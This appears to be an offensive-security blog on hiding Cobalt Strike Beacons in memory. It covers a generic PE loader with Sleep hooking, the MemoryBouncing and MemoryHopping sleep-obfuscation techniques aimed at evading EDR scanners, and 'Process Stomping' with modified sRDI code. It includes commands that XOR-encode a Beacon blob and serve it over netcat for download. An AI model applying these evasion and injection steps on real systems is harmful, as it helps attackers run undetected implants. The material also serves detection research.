Naksyn’s blog

Raising Beacons without UDRLs and Teaching them How to Sleep

2024-07-02T00:00:00-04:00

TL;DR
Intro
UDRL-less Beacon generation
UDRL-less Beacon loading
Hook Sleep and prototype stuff
PoC || GTFO #1
Memory Bouncing
PoC || GTFO #2
Memory Hopping
PoC || GTFO #3
Outro

TL;DR

This journey started because I wanted a simpler way than a Beacon UDRL to experiment with sleep obfuscation techniques.

It turned out that by creating a raw UDRL-less Cobalt Strike Beacon, using a specific cna script, one could use a generic PE loader to execute it by calling the EntryPoint twice and using an undocumented DllMain execution path triggered with a specific dwReason value in the second call.

This allowed a direct IAT Sleep hook on the Beacon and a quicker way to prototype two techniques, dubbed MemoryBouncing and MemoryHopping, to overcome the Elastic EtwTI-FluctuationMonitor tool, which implements a detection for sleep obfuscation techniques that routinely change permissions from RX to RW.

MemoryBouncing is a Sleep obfuscation technique that avoids RX -> RW detection by saving an encrypted copy of the PE, freeing the PE memory while sleeping and allocating it again as RWX before resuming execution. This technique made it possible to operate a UDRL-less Beacon without being detected by EtwTI-FluctuationMonitor, CFG-FindHiddenShellcode, Moneta and the latest release (to date) of PE-Sieve with aggressive scan options.

The MemoryHopping technique always allocates RWX memory at a different address, which requires adjusting the return address and remapping and relocating the PE at each hooked sleep call. With this technique the payload must not hold cross memory references, otherwise an execution exception is raised after the memory hop because the referenced memory address has been freed.

The PoCs for the techniques are included in the DojoLoader project available on my GitHub, which can be useful to quickly prototype and test Sleep obfuscation techniques.

Intro

UDRLs with Beacon are very powerful and allow for the smallest memory footprint for the running Beacon. However, they come with some disadvantages: development is more complex since UDRLs require Position Independent Code, and debugging can be so challenging it might feel like it ages you decades. Cobalt Strike 4.9.1 introduced a feature that allows Beacon to be exported without a UDRL. However, in this blogpost one can read: “[this feature brings] the ability to export Beacon without a reflective loader which adds official support for prepend-style UDRLs”.

What about non-prepend style UDRLs like a generic PE loader?

Even though I might not get official support for generic PE loaders (why not though?) and given that UDRLs are better operational tools, it sounded like a nice capability to have at hand.

As per my current understanding, following are the pros and cons of using UDRLs and generic PE loaders to load a Beacon:

UDRLs:

PRO: Smallest malicious memory footprint - all malicious code can be encrypted
PRO: Best usage for process injection (shellcode blob one can just execute)
CON: increased development complexity
CON: increased debugging complexity
CON: size constraints
CON: reliance on dedicated thread to execute Beacon, asynchronous calls and timer queues to perform sleep obfuscation operations.

Generic PE Loaders:

PRO: Simplified development and debugging
PRO: can do a broader range of sleep obfuscation operations because the loader can access Beacon’s memory directly.
PRO: no size limit
PRO: can avoid creating new thread to run the beacon
CON: Bigger malicious memory footprint - Beacon can be encrypted but PE loading code cannot be encrypted as easily
CON: far less suitable for injection than shellcode

The higher number of PROs for PE loaders does not mean they are better for stealth operations than UDRLs, but PE loaders can still have use cases.

To my knowledge, before Cobalt Strike version 4.9.1 it wasn’t possible to export a Beacon without bringing its own stock loader. This means that the “Stageless Windows Payload” generated in raw format is essentially a dll that will in turn load Beacon once executed. We’ll refer to that as the “stock raw beacon payload” within this blogpost. Loading the stock raw beacon payload leaves lots of artifacts in memory (see picture below), and one way to avoid that is to use custom UDRLs.


Moneta output for a stock beacon

Indeed, UDRLs make it possible to get rid of the stock loader and also allow dynamic IAT hooking to do sleep obfuscation and other evasive techniques, without using the SleepMask.

Doing dynamic IAT hooking while loading the stock raw Beacon payload will not hook the sleep API of the real Beacon, because its imports will be resolved by the “internal” loader embedded in the dll, not by the loader that you will use to inject the stock beacon dll. This is an issue described in the shellcode fluctuation project by Mariusz Banach (mgeeky), where he had to hook the Sleep API in the kernel32.dll, instead of doing it dynamically, to effectively intercept the Beacon sleep calls while hitting kernel32.dll.

However, after version 4.9.1 one could export a Beacon without UDRL, get rid of the stock loader artifacts left in memory and dynamically hook the APIs exported by the raw Beacon e.g. to implement obfuscation without a SleepMask. We can also avoid creating a new thread and live onto the main loader’s thread.

UDRL-less Beacon generation

I won’t try to explain how UDRLs work since there are amazing blog posts available here and here, so please have a look at them if you need a refresher. Essentially, I needed to use a Beacon that is not “wrapped” by a UDRL so that I can directly hook API calls from the payload after having it mapped in memory. I couldn’t make the cna snippet from the Fortra blogpost work to generate a UDRL-less Beacon, so after a bit of sifting through the Cobalt Strike documentation and some failed attempts I came up with this CNA:

# ------------------------------------ 
# $1 = DLLfilename 
# $2 = arch 
# ------------------------------------ 
 
set BEACON_RDLL_SIZE { 
    warn("Running 'BEACON_RDLL_SIZE' for DLL " .$1. " with architecture " .$2);    
    return "0"; 
}

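# ------------------------------------ 
# $1 = DLLfilename 
# $2 = DLL content (the Beacon payload) 
# $3 = arch 
# ------------------------------------ 
 
set BEACON_RDLL_GENERATE {
    local('$arch $beacon $fileHandle $ldr $path $payload');
    $beacon = $2;
    $arch = $3;

    # Apply the transformations to the beacon payload
    $beacon = setup_transformations($beacon, $arch);

    # Return the Beacon as-is, without prepending any loader
    return $beacon;
}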

After loading this CNA and generating a payload (Payloads -> Windows Stageless Payloads -> Output:Raw) we can see the differences from the stock payload in the following figures:


stageless stock Beacon payload generated without cna


imports of a Beacon without UDRL

We can see that the stock beacon payload isn’t even parsed as a valid PE because it essentially is a blob of position independent code that initializes and runs the Beacon payload. On the other hand, the payload generated with our CNA script gives us a valid PE with some interesting imports such as WinHTTP. Indeed, WinHTTP is the library chosen as HTTP library during payload generation, and the fact that it’s included as an import entry is a sign that we are dealing with the unwrapped (by UDRL) Beacon payload.

UDRL-less Beacon loading

After initially failing to load the UDRL-less Beacon payload for no apparent valid reason I began investigating what was going on. What I found is that there are essentially two different execution paths that are triggered by calling the dll entrypoint with fdwReason value 1 (DLL_PROCESS_ATTACH) and 4.


UDRL-less Beacon Dllmain execution paths

The execution branches taken with fdwReason 1 or 4 lead to subroutines starting at addresses 0x1800CA74 and 0x18001A580 respectively.


different subroutines called if different fdwReason value is used

It’s clear now that the UDRL-less Beacon should be loaded by calling the entrypoint using fdwReason 1 and 4, but in which order? And what are the subroutines actually doing?

After some debugging I found that the subroutine starting at 0x1800CA74 is responsible for single-byte xoring of the 0x1800 bytes of Beacon configs.
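To make the single-byte xoring step concrete, here is a minimal Python sketch. The key value and the sample config content are placeholders chosen for illustration; only the 0x1800 block size comes from the analysis above.

```python
def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte of `data` with the same one-byte key."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must fit in one byte")
    return bytes(b ^ key for b in data)


CONFIG_SIZE = 0x1800       # size of the config block mentioned above
HYPOTHETICAL_KEY = 0x5A    # placeholder, not the real Beacon key

# Fake config padded to the block size, then masked and unmasked again.
plain = b"sleeptime=60000".ljust(CONFIG_SIZE, b"\x00")
masked = xor_single_byte(plain, HYPOTHETICAL_KEY)
unmasked = xor_single_byte(masked, HYPOTHETICAL_KEY)
```

Since XOR is its own inverse, the same routine both masks and unmasks the block, which is why a single subroutine is enough to bring the configs to cleartext.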


subroutine responsible for config singlebyte-xoring called after using fdwReason 1

On the other hand, the subroutine starting at 0x18001A580 contains a function block at 0x18000CD44 that gets hit after the sleeptime to reach the C2 set in the malleable profile. This subroutine uses some of the cleartext configuration parameters after the single-byte xor has been applied by the subroutine at 0x1800CA74.


one of the subroutines responsible for C2 polling


Decrypted Beacon configs used in the routine at address 0x18000CD44

It is now clear that in order to successfully load a UDRL-less Beacon we should call the Dllmain entrypoint such that the configuration gets decrypted (fdwReason 1) and subsequently used to poll the C2 (fdwReason 4). Including this logic in a generic PE loader that uses MemoryModule to map the dll in memory and execute it, will allow us to map the UDRL-Less Beacon payload.
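The ordering constraint can be pictured with a toy model in Python. This is not Beacon code: the class, the name REASON_START_BEACON and the "return False when the config is still masked" behaviour are all assumptions made for illustration. Only the two fdwReason values and their order come from the analysis above.

```python
DLL_PROCESS_ATTACH = 1
REASON_START_BEACON = 4   # made-up name; the post only documents the value 4


class ToyBeacon:
    """Toy stand-in for a DLL whose entry point has two execution paths."""

    def __init__(self, masked_config: bytes, key: int):
        self._masked = masked_config
        self._key = key
        self.config = None   # cleartext config, filled in by reason 1

    def dll_main(self, reason: int) -> bool:
        if reason == DLL_PROCESS_ATTACH:
            # First path: bring the config to cleartext.
            self.config = bytes(b ^ self._key for b in self._masked)
            return True
        if reason == REASON_START_BEACON:
            # Second path: needs the cleartext config to do anything useful.
            return self.config is not None
        return True


def load(beacon: ToyBeacon) -> bool:
    """Call the entry point twice, in the order described above."""
    return (beacon.dll_main(DLL_PROCESS_ATTACH)
            and beacon.dll_main(REASON_START_BEACON))


masked = bytes(b ^ 0x5A for b in b"c2=example")
ok = load(ToyBeacon(masked, 0x5A))
```

In this toy, calling the entry point with reason 4 alone fails because the config is still masked, which mirrors why a loader that only issues DLL_PROCESS_ATTACH is not sufficient.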

Hook Sleep and prototype stuff

In order to load a UDRL-less Beacon I created the DojoLoader project, a generic PE loader that you can also use to prototype sleep obfuscation, as covered later in the post.

DojoLoader uses the MemoryModule implementation of the DynamicDllLoader project by ORCA000. I added modularity and some features like:

download and execution of (xored) shellcode from HTTP
dynamic IAT hooking for Sleep function
three different Sleep obfuscation techniques implemented in the hook library

Executing a UDRL-less beacon by itself is not very useful if you’re not trying to hide a little bit. However, we are now resolving dynamically the imports of a UDRL-less beacon so we can hook the Sleep function used by the Beacon and apply our obfuscation techniques.

PIMAGE_IMPORT_BY_NAME thunkData = MakePointer(PIMAGE_IMPORT_BY_NAME, pMemModule->lpBase, (*thunkRef));
*funcRef = GetProcAddress(hMod, (LPCSTR)&thunkData->Name);
printf("[+] Function Name: %s, Address: %p\n", thunkData->Name, *funcRef);

// Check if the function should be hooked
if (Configs.SleepHookFunc != NULL) {
    if (check_hook((LPCSTR)&thunkData->Name)) {
        // Point the IAT entry at the hook instead of the resolved export
        printf("[+] Hooking function: %s\n", thunkData->Name);
        *funcRef = Configs.SleepHookFunc;
    }
}
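The idea behind the snippet above can be modelled in a few lines of Python, with a dictionary standing in for the import address table. All names here are hypothetical and nothing touches real process memory; it is only meant to show that the hook is decided at import resolution time.

```python
def resolve_imports(import_names, exports, hooks):
    """Build a toy IAT: use the hook when one is registered for the
    imported name, otherwise fall back to the module's real export."""
    return {name: hooks.get(name, exports[name]) for name in import_names}


def real_sleep(ms):
    return f"real Sleep({ms})"


def real_get_tick_count():
    return "real GetTickCount()"


def hooked_sleep(ms):
    # A real hook would run its obfuscation routine around the sleep.
    return f"hooked Sleep({ms})"


exports = {"Sleep": real_sleep, "GetTickCount": real_get_tick_count}
iat = resolve_imports(["Sleep", "GetTickCount"], exports, {"Sleep": hooked_sleep})
```

Every call the payload makes through its table entry for Sleep now lands in the hook, while the other imports are left untouched.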

After applying a simple RW -> encrypt -> Sleep -> decrypt -> RX scheme as our sleep obfuscation we should have no artifacts shown by Moneta. Indeed, Moneta does not alert on memory anomalies. However, this “old” technique cannot get past the latest PE-Sieve and EtwTI-FluctuationMonitor.
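To see why a scheme that flips permissions at every sleep is easy to spot, consider this simplified Python sketch of a fluctuation counter. It is not how EtwTI-FluctuationMonitor is implemented; the event format and the threshold are assumptions made for illustration.

```python
from collections import Counter


def flag_fluctuating_regions(events, threshold=3):
    """Return the base addresses that went RX -> RW at least `threshold`
    times. `events` is an ordered list of (base_address, protection)."""
    last_protection = {}
    flips = Counter()
    for base, protection in events:
        if last_protection.get(base) == "RX" and protection == "RW":
            flips[base] += 1
        last_protection[base] = protection
    return sorted(base for base, count in flips.items() if count >= threshold)


# Region 0x1000 toggles at every sleep cycle; region 0x2000 stays RWX.
events = [
    (0x1000, "RX"), (0x1000, "RW"),
    (0x1000, "RX"), (0x1000, "RW"),
    (0x1000, "RX"), (0x1000, "RW"),
    (0x2000, "RWX"),
]
flagged = flag_fluctuating_regions(events)
```

A region that never changes protection produces no RX -> RW transitions at all, which is the gap the techniques in the following sections try to use.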

PoC || GTFO #1

Here’s a video using Dojoloader to load an UDRL-less Beacon payload, hooking Sleep and applying a RW -> encrypt -> Sleep -> decrypt -> RX sleep obfuscation scheme:

Memory Bouncing

I find DojoLoader useful to prototype and test sleep obfuscation techniques directly on a UDRL-less beacon, so I thought about a couple of ways to circumvent EtwTI-FluctuationMonitor and CFG-FindHiddenShellcode.

John Uhlmann (@jdu2600) hinted in his Black Hat Asia presentation that one could potentially jump to a new location every time to circumvent the EtwTI-FluctuationMonitor detection. @shubakki also describes in a blogpost a clever way to circumvent the detection by behaving like proper JIT memory: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute [-> Free]

To me, one of the simplest Sleep hook functions that could avoid the RX -> RW detection does the following:

Copy the mapped PE to a buffer and encrypt it
Free the mapped PE address
Sleep for the requested time (e.g. SleepEx)
Allocate RWX memory at the same address where the PE was mapped
Decrypt the buffer and copy it over the RWX memory
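The sequence of steps above can be followed in a pure Python simulation, where a dictionary plays the role of the address space. Nothing here allocates executable memory; the ToyAddressSpace class, the XOR "encryption" and the key are stand-ins invented for this sketch.

```python
class ToyAddressSpace:
    """Dictionary-backed model of a process address space."""

    def __init__(self):
        self.regions = {}   # base address -> (protection, bytearray)

    def alloc(self, base, size, protection):
        if base in self.regions:
            raise MemoryError("address already in use")
        self.regions[base] = (protection, bytearray(size))

    def free(self, base):
        del self.regions[base]


def xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def bounce(space, base, key, sleep_fn):
    _, image = space.regions[base]
    saved = xor(bytes(image), key)               # 1. encrypted copy
    space.free(base)                             # 2. free the mapped image
    sleep_fn()                                   # 3. sleep
    space.alloc(base, len(saved), "RWX")         # 4. same address, RWX
    space.regions[base][1][:] = xor(saved, key)  # 5. decrypt and copy back


space = ToyAddressSpace()
space.alloc(0x10000, 4, "RWX")
space.regions[0x10000][1][:] = b"\x90\x90\xc3\x00"
mapped_during_sleep = []
bounce(space, 0x10000, 0x41,
       lambda: mapped_during_sleep.append(0x10000 in space.regions))
```

During the simulated sleep the region is simply absent from the address space, and at no point does an existing region change protection.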

I like to call this technique MemoryBouncing and although it might not be the stealthiest chain because of the RWX allocation, it avoids using VirtualProtect altogether, so YMMV. Interestingly, this technique made it possible to operate a UDRL-less Beacon undetected by EtwTI-FluctuationMonitor, CFG-FindHiddenShellcode, Moneta and the latest release (to date) of PE-Sieve with aggressive scan options. Even though DojoLoader does not yet include stack spoofing techniques, the stack address would point to an invalid address if inspected during sleep, because the PE memory has been freed.

PoC || GTFO #2

Here’s a video showing MemoryBouncing using an UDRL-less Beacon payload against EtwTI-FluctuationMonitor and CFG-FindHiddenShellcode (the scan was pretty lengthy):

Memory Hopping

Another approach to circumvent RX -> RW detection would be, as @jdu2600 hinted in his presentation, to allocate RWX always on a different address, but in this case there are some things to take into consideration:

since we’re not dealing with shellcode or PIC, PE relocations need to be calculated at each change of memory
the return address needs also to be adjusted at each change.
payload memory allocations would need to be hooked and deal with the issues of always moving in memory (broken pointer references) or use a payload that is natively compatible with this technique.

After the hook is hit this technique will perform the following steps:

save the return address
copy the mapped PE bytes to a buffer and optionally encrypt it
Free the memory of the mapped payload
allocate RWX memory on a different address
calculate delta and adjust the return address accordingly
copy bytes from the buffer to the newly created memory region
perform relocations on the copied bytes
resume execution from the adjusted return address
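The delta and relocation arithmetic in these steps can be sketched in Python on a plain byte buffer. The list of relocation offsets is assumed to be already known (a real loader would read it from the PE relocation directory), and the base addresses are arbitrary example values.

```python
import struct

MASK64 = 0xFFFFFFFFFFFFFFFF


def hop(image: bytes, old_base: int, new_base: int,
        reloc_offsets, return_address: int):
    """Rebase a toy 64-bit image and the saved return address.

    Every 8-byte little-endian pointer found at an offset listed in
    `reloc_offsets` is shifted by the same delta as the image base."""
    delta = new_base - old_base
    moved = bytearray(image)
    for offset in reloc_offsets:
        (pointer,) = struct.unpack_from("<Q", moved, offset)
        struct.pack_into("<Q", moved, offset, (pointer + delta) & MASK64)
    return bytes(moved), return_address + delta


OLD_BASE = 0x180000000
NEW_BASE = 0x190000000

# 8 bytes of "code" followed by one absolute pointer into the image.
image = b"\x90" * 8 + struct.pack("<Q", OLD_BASE + 0x4)
moved, new_return = hop(image, OLD_BASE, NEW_BASE, [8], OLD_BASE + 0x1234)
(new_pointer,) = struct.unpack_from("<Q", moved, 8)
```

Only pointers covered by the relocation list are fixed up. Any address the payload stored elsewhere at runtime still points at the old, freed region, which is the broken pointer reference issue mentioned above.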

PoC || GTFO #3

I dubbed this technique MemoryHopping and as a PoC I used a test program that connects via socket, prints via stdout and sleeps. In the following video we can see how DojoLoader is hooking the Sleep function and remapping the PE at a new address (linearly incremented) every time the hook is hit, properly adjusting the return address before resuming execution.

Outro

RX->RW detections can detect a wide range of sleep obfuscation techniques and attackers need to find more creative ways to hide a beacon in memory while sleeping. This post described an attempt in that direction using a generic PE loader to quickly prototype and test ideas that can then be further improved and engineered if deemed worthy.

Mockingjay revisited - Process stomping and loading beacon with sRDI

2023-11-18T00:00:00-05:00

TL;DR
Credits
Intro
Process Stomping
using sRDI to load a Beacon on an RWX process’ section
Putting it all together: sRDI — Reflective-Loaderless Beacon — Process Stomping
Outro

TL;DR

The original Mockingjay technique abuses dlls with RWX sections to obtain a stealthier way to inject malicious code, basically by avoiding dynamic memory allocation and the usage of VirtualProtect, since RWX is already what we need. The same reasoning can also be applied to executables with RWX sections because we can:

start the executable in a suspended state.
write some shellcode on the RWX section.
resume the thread on the desired entry point.

This technique, dubbed Process Stomping, is a variation of hasherezade’s Process Overwriting and it has the advantage of writing a shellcode payload on a targeted section instead of writing a whole PE payload over the hosting process address space.

We fell in love with DoublePulsar in 2017 so we wanted to use sRDI with a Reflective-Loaderless payload as shellcode. For this reason we used the recent Cobalt Strike 4.9 feature that allows the generation of a Beacon without a reflective loader and we modified the sRDI project to generate shellcode that will in turn bootstrap the reflective loading of Beacon on the RWX region of the stomped executable.

We tested the injection on a GlassWire executable (x86) that has a section called .themida with RWX permissions and as a final result we got the process running with an injected beacon living in the RWX memory range. This was not a vulnerability on GlassWire side given the fact that every executable with RWX permissions and enough space to host a Beacon would be a good fit.

The technique’s PoC can be found on my GitHub, along with the lightly adapted sRDI project used.

Credits

A huge thank you to:

Aleksandra Doniec (@hasherezade) for Process Overwriting
Nick Landers for sRDI

Intro

Poking around with Moneta I stumbled upon some strange behaviour exhibited by GlassWire, a tool I often use because I find it very useful to spot anomalies and infections.


Moneta output for GlassWire executable

As can be seen in the picture, the GlassWire executable has a section named .themida, which immediately recalls the famous packer. The section has a size of around 7600 kB and RWX permissions.
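Section permissions like the ones shown by PE-bear come from the Characteristics field of each section header. The following Python sketch decodes the three memory flags defined in the PE format; the two sample values are illustrative and not taken from the GlassWire binary.

```python
# Section characteristic flags from the PE/COFF format.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def section_permissions(characteristics: int) -> str:
    """Render the memory flags of a section as a string such as 'R-X'."""
    flags = (
        ("R", IMAGE_SCN_MEM_READ),
        ("W", IMAGE_SCN_MEM_WRITE),
        ("X", IMAGE_SCN_MEM_EXECUTE),
    )
    return "".join(letter if characteristics & mask else "-"
                   for letter, mask in flags)


def is_rwx(characteristics: int) -> bool:
    return section_permissions(characteristics) == "RWX"


typical_text_section = 0x60000020   # code, readable, executable
rwx_section = 0xE0000020            # code, readable, writable, executable
```

Filtering the section headers of the executables on a system with a check like is_rwx is one way to find other binaries with the same property, whether to hunt for them or to monitor them.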

The key element here is that Moneta is alerting “modified code” for the .themida section for the entirety of its size. This is intended behaviour for packers and the like, since packed binaries have totally different content on disk than when unpacked in memory.

This would be a perfect spot to hide in, since Moneta will alert this exact same behaviour on every GlassWire binary. Notably, there’s also a 64 kB RWX private commit and as a cherry on top, the executable is 32 bit and signed. Double-checking with ProcessHacker and PEBear confirmed the finding.


ProcessHacker Memory view for GlassWire executable


PEbear section view for GlassWire executable

While looking at these interesting characteristics, Mockingjay injection technique immediately came to mind. However, it originally aimed at writing malicious code onto a dll with RWX permissions, not onto a running process’ section. So we decided to investigate if the same Mockingjay principle could be applied also to executables and we wanted to load a beacon onto the mapped RWX section itself, instead of allocating dynamic memory. This post documents the journey to achieve the aforementioned outcome.

Process Stomping

One common way of writing malicious code onto a process’ section is to use some variation of the Process Hollowing technique. As a refresher, Process Hollowing uses the following Windows APIs:

CreateProcess - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the process’s primary thread.
ZwUnmapViewOfSection or NtUnmapViewOfSection - used to unmap the process memory. These two APIs basically release all memory pointed to by a section.
VirtualAllocEx - used to allocate new memory for malicious code to be written.
WriteProcessMemory - used to write the malicious code to the target process space.
SetThreadContext - used to point the entrypoint to a new code section that it has written.
ResumeThread - self-explanatory.

Process Hollowing has been pretty popular among malware authors for quite a while and, in the meantime, some variations of this technique have been published. One notable variation is called Process Overwriting and it avoids steps 2 and 3 by writing the malicious PE over the hosting process memory space (started in step 1). This is what an implanted PE looks like in memory (the host process is calc.exe).


Process Overwriting injected PE - taken from hasherezade’s github repository

This is nearly everything we need, except for the fact that we would need to write some shellcode over a specific section and not a PE over the whole hosting process address space right from the base address.

Quite similarly to the Module Stomping counterpart, our aim in Process Stomping is to write some shellcode onto a specific section of a target process that we started in a suspended state. For the purpose of this blogpost, the section will be the one with RWX permissions (.themida in the GlassWire executable) so that we can exploit the generous permissions and the likelihood of being in a quite popular false positive situation for GlassWire.

These are the main steps of the ProcessStomping technique:

CreateProcess - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the process’s primary thread.
WriteProcessMemory - used to write the malicious shellcode to the target process section.
SetThreadContext - used to point the entrypoint to a new code section that it has written.
ResumeThread - self-explanatory.

The main difference between the existing ProcessOverwriting technique and ProcessStomping is that the former overwrites the target process’ memory space with a PE, starting from the top of it. ProcessStomping, on the other hand, writes shellcode only onto a specific section of the target process. We can then add a bit more juice by asking ourselves this question:

It’s a waste of an opportunity to stomp on an executable with a native RWX section using some shellcode that will then dynamically allocate our payload. Why not let our payload live within the RWX section instead?

using sRDI to load a Beacon on an RWX process’ section

In order to reach our objective and make our payload live in the RWX section of the target process that we want to stomp, we can combine the new Cobalt Strike 4.9 feature of exporting Beacon without a Reflective Loader with the sRDI project used as a prepended loader for Beacon. For those unfamiliar with sRDI, it can essentially be seen as a tool that turns dlls into position independent shellcode, even on the fly.

Executed sRDI shellcode will load the dll using Reflective Injection and it can provide some very useful addendums to the original Stephen Fewer’s technique, such as access to the shellcode location and argument passing.

Since sRDI is using VirtualAlloc to load the dll and VirtualProtect to finalize sections, we commented out the relevant codeblocks and set the base address for the subsequent dll loading as the written shellcode location (within the .themida section) plus an applied offset. In this way the dll will be loaded onto the section itself rather than on a dynamically allocated memory space and we will be maintaining a whole RWX section because VirtualProtect won’t be called after the dll’s sections are written.

	// Commented VirtualAlloc codeblock
	/*baseAddress = (ULONG_PTR)pVirtualAlloc(
		(LPVOID)(ntHeaders->OptionalHeader.ImageBase),
		alignedImageSize,
		MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
	);

	if (baseAddress == 0) {
		baseAddress = (ULONG_PTR)pVirtualAlloc(
			NULL,
			alignedImageSize,
			MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
		);
	}*/
	const size_t offset = 500 * 1024;  // 500 kB chosen offset from shellcode location - adapt it to your needs
	baseAddress = (ULONG_PTR)pvShellcodeBase + offset;
	
	[...]
	
	// Commented VirtualProtect codeblock
	/*
	pVirtualProtect(
		(LPVOID)(baseAddress + sectionHeader->VirtualAddress),
		sectionHeader->SizeOfRawData,
		protect, &protect
	);
	*/
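Because the base address is now a fixed offset from the shellcode location rather than a fresh allocation, it is worth checking that everything fits inside the section. The Python sketch below does that arithmetic; the shellcode and image sizes are hypothetical, while the section size and the 500 kB offset come from the text and snippet above.

```python
KB = 1024


def image_fits(section_size, shellcode_offset, shellcode_size,
               load_offset, image_size):
    """Return True if the shellcode blob and the image loaded at
    shellcode_offset + load_offset fit in the section without overlapping."""
    image_start = shellcode_offset + load_offset
    no_overlap = shellcode_size <= load_offset
    in_bounds = image_start + image_size <= section_size
    return no_overlap and in_bounds


SECTION_SIZE = 7600 * KB   # approximate .themida size reported above
LOAD_OFFSET = 500 * KB     # offset used in the modified sRDI code

# Hypothetical sizes, chosen only for illustration.
fits = image_fits(SECTION_SIZE, 0, 320 * KB, LOAD_OFFSET, 300 * KB)
```

If the shellcode blob were larger than the chosen offset, the loaded image would start inside the blob that is still executing, which is why the offset has to be adapted to the payload size.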
	

There’s one more thing to address: if we create a process in suspended state and then write something onto an RWX section, we’ll have PAGE_EXECUTE_WRITECOPY (WCX on ProcessHacker) permissions on the section’s areas that are not written, and this will leave a non-homogeneous RWX section. As per Microsoft documentation:

PAGE_EXECUTE_WRITECOPY enables execute, read-only, or copy-on-write access to a mapped view of a file mapping object. An attempt to write to a committed copy-on-write page results in a private copy of the page being made for the process. The private page is marked as PAGE_EXECUTE_READWRITE, and the change is written to the new page.

This is what the .themida section looks like after the GlassWire process has been started in suspended state:


PAGE_EXECUTE_WRITECOPY of .themida section on process start

If we directly write a shellcode and load a dll payload onto this section this is what we’ll get:


WCX and RWX Mojito cocktail

So to avoid leaving WCX permissions around we can overwrite the whole section once with dummy data in order to get a clean and contiguous RWX section even after the shellcode gets written and the payload is loaded.
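The effect of copy-on-write on the section layout can be modelled page by page. This Python sketch is a simplification that assumes 4 kB pages and tracks only which pages have been written; the section size and write offsets are made up.

```python
PAGE_SIZE = 0x1000


def protections_after_writes(section_size, writes):
    """Return one label per page: 'WCX' if the page was never written,
    'RWX' once a write has forced a private copy of it.
    `writes` is a list of (offset, length) pairs within the section."""
    page_count = (section_size + PAGE_SIZE - 1) // PAGE_SIZE
    pages = ["WCX"] * page_count
    for offset, length in writes:
        if length == 0:
            continue
        first = offset // PAGE_SIZE
        last = (offset + length - 1) // PAGE_SIZE
        for index in range(first, last + 1):
            pages[index] = "RWX"
    return pages


SECTION = 4 * PAGE_SIZE
partial = protections_after_writes(SECTION, [(0x1800, 0x100)])
full = protections_after_writes(SECTION, [(0, SECTION)])
```

A partial write leaves a mix of WCX and RWX pages, while one write covering the whole section makes every page private, so later writes no longer change the layout.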

For this very same reason of not leaving unnecessary artifacts, we’ll also overwrite the sRDI shellcode blob with dummy data but only after it has been executed and loaded our Beacon in the right RWX section.

The visual representation of what we would like to achieve is depicted in the following figure.


Process Stomping using sRDI to load a payload on an executable’s section

Putting it all together: sRDI — Reflective-Loaderless Beacon — Process Stomping

After compiling the sRDI project with our modifications, some post build actions are performed and their aim is to extract the .text section of the built executable placing it under the bin folder. This is because sRDI code is written as PIC (Position Independent Code) so that it can be executed like shellcode. The next step is to update the newly generated PIC into the sRDI tools used for loading or generating the final shellcode blob:

cd C:\Users\naksyn\sRDI\sRDI-master

python .\lib\Python\EncodeBlobs.py .\

We can now generate a Cobalt Strike Beacon dll without a reflective loader. Be sure to generate an x86 payload; you can double check the output on the Script Console to make sure the Beacon dll has been generated correctly.


Cobalt Strike Script Console output during the generation of a Beacon dll without Reflective Loader

The payload dll can now be converted into shellcode. sRDI will prepend its bootstrap in the following way:


sRDI shellcode blob structure - image taken from: https://www.netspi.com/blog/technical/adversary-simulation/srdi-shellcode-reflective-dll-injection/

python ..\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

The shellcode blob can then be xored with a keyword and downloaded using a simple socket, as implemented in the Process Stomping repo.

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin
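The contents of xor.py are not shown in this post, so the following Python sketch is only an assumption about what a keyword XOR of this kind usually looks like: a repeating-key XOR where the keyword is cycled over the input.

```python
from itertools import cycle


def xor_with_keyword(data: bytes, keyword: str) -> bytes:
    """XOR `data` with the bytes of `keyword`, repeating the keyword
    as many times as needed to cover the input."""
    key = keyword.encode()
    if not key:
        raise ValueError("keyword must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


blob = bytes(range(32))                       # stand-in for the shellcode blob
encoded = xor_with_keyword(blob, "Bangarang")
decoded = xor_with_keyword(encoded, "Bangarang")
```

The receiving side applies the same function with the same keyword to recover the original blob after the download.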

Here’s a video demonstration:

After running Moneta against the injected process we get these results:


Moneta output against the injected process

We can see that the .themida section has RWX permissions for the whole size of it and that there’s a thread started from an offset because we resumed the main thread starting at the shellcode address.

Outro

Executables with RWX sections can be abused similarly to dlls, but there are differences that may offer better detection opportunities.

In fact, Process Stomping technique requires starting the target process in a suspended state, changing the thread’s entry point, and then resuming the thread to execute the injected shellcode. These are operations that might be considered suspicious if performed in quick succession and could lead to increased scrutiny by some security solutions.

However, as of November 2023, exploiting RWX sections in executables is not a widely abused technique and may allow an attacker to blend in, potentially being dismissed as a false positive, without resorting to the well-known Mockingjay technique applied to DLLs.

By leveraging sRDI or other purposely built custom Reflective Loaders, malicious payloads can be written, loaded, and executed within the available RWX sections. This avoids the need for dynamic memory allocation during both the stages of shellcode and payload execution.

Improving the stealthiness of memory injection techniques

2023-06-01T00:00:00-04:00

TL;DR
Credits
Intro
Injection Categories
Improvement Strategy
Module Shifting
Outro

The topic has been presented at x33fcon 2023 Talk - Improving the Stealthiness of Memory Injection Techniques (slide deck is available here)

TL;DR

Injection techniques can be grouped in three main categories:

Code Injection
PE Injection
Process Manipulation

This post focuses on improving Module Stomping and Module Overloading, part of the PE injection techniques, which have been chosen as candidates because they avoid dynamic memory allocation and rely on a common operation (LoadLibrary) that is the cornerstone of the technique.

The public implementations of Module Stomping to date get the “Modified Code” IoC from Moneta because of the stomped code living on the hosting dll.

Moneta will compare the dll bytes on disk with in-memory bytes and the output will be the “Modified Code” IoC. This outcome can be avoided by looking at injection techniques from a higher level and thinking about a proper improvement strategy. In fact, there are several moving parts in an injection technique:

the loader
the injection technique
the payload

